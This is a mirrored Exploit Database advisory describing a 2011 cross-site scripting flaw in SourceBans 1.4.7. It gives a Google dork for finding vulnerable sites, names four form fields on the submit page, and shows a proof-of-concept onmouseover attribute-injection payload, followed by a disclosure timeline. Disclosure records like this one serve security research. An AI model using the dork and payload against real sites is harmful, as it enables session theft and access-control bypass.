SourceBans 1.4.7 – Cross-Site Scripting

• Exploit Database
• 35 阅读

• 作者： Sw1tCh
  日期： 2011-02-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16148/

• # Exploit Title: SourceBans Version 1.4.7XSS
  # Google Dork: inurl:"sourcebans/index.php?p=submit"
  # Date: Feb. 9th 2011
  # Author: Sw1tCh
  # Software Link: http://www.sourcebans.net/
  # Version: 1.4.7
  
  
  Info:
  SourceBans is an application for managing publicly the banned users for a Steam Server.
   
  #-= The Advisory =-
  SourceBans is vulnerable to a Cross Site Scripting Vulnerability (XSS) in which an attacker can execute scripts on a client side resulting in a bypass of access controls and or a credentials loss.
  
  #-= Example =-
  
  http://<SITE>/sourcebans/index.php?p=submit
  
  	- > BanIP =>" onmouseover=prompt(928137) bad="
  	- > Comments =>" onmouseover=prompt(928137) bad="
  	- > Name => " onmouseover=prompt(928137) bad="
  	- > Email =>" onmouseover=prompt(928137) bad="
  
  
  
   
  #Disclosure Information:
  - Vulnerability found and researched: January 18th 2011
  - Vendor (SourceBans) contacted: January 18th 2011
  	[ Time Reduced because Ops of IRC channel were dicks ] 
  - Disclosed to Exploit-DB, Bugtraq and InterN0T: 
  
  
  
  
  
  #Credits: Sw1tCh
  
  #Shoutouts : gen0cide, Scruffy, Griff, D00dl3,